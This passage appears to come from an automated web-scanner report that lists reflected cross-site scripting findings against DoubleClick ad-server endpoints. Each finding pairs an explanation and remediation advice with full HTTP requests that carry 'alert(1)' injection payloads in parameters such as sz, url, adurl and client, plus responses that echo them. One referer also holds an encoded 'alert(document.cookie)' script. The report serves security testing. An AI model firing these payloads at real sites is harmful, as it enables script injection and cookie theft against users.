3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9729

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
icles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951d1dd4"-alert(1)-"7f0ce352b24&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc
...[SNIP]...

4.13. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8de9"-alert(1)-"949f2676f9f was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798c8de9"-alert(1)-"949f2676f9f&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9729

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798c8de9"-alert(1)-"949f2676f9f&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3
...[SNIP]...

4.14. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9b6a"-alert(1)-"cafab609dca was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3Fd9b6a"-alert(1)-"cafab609dca&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:33:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9723

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3Fd9b6a"-alert(1)-"cafab609dca&redirectURL=http%3a%2f%2flp2.turbotax.com/ty10/bn/geo_tx%3Fcid%3Dbn_im_nf_anb_opgeotxT_txG_pk_300x250%26priorityCode%3D4654800000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "
...[SNIP]...

4.15. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.91

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15c43"-alert(1)-"cd748a8fe0a was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=15c43"-alert(1)-"cd748a8fe0a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4961
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 02 Feb 2011 20:27:49 GMT
Expires: Wed, 02 Feb 2011 20:27:49 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=15c43"-alert(1)-"cd748a8fe0ahttp://degrees.classesusa.com/schools/?sourceid=50545246-232704189-39897819");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 300;
var winH =
...[SNIP]...

4.16. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.91

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 138f5"-alert(1)-"eada4e3efbc was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA138f5"-alert(1)-"eada4e3efbc&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:26:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
i8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA138f5"-alert(1)-"eada4e3efbc&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819");
var wmode = "opaque";
var bg
...[SNIP]...

4.17. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.91

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66758"-alert(1)-"219072ecf8b was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-453708552427379466758"-alert(1)-"219072ecf8b&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:27:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-453708552427379466758"-alert(1)-"219072ecf8b&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW
...[SNIP]...

4.18. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.91

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78291"-alert(1)-"1aa4fa9a8f0 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=178291"-alert(1)-"1aa4fa9a8f0&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
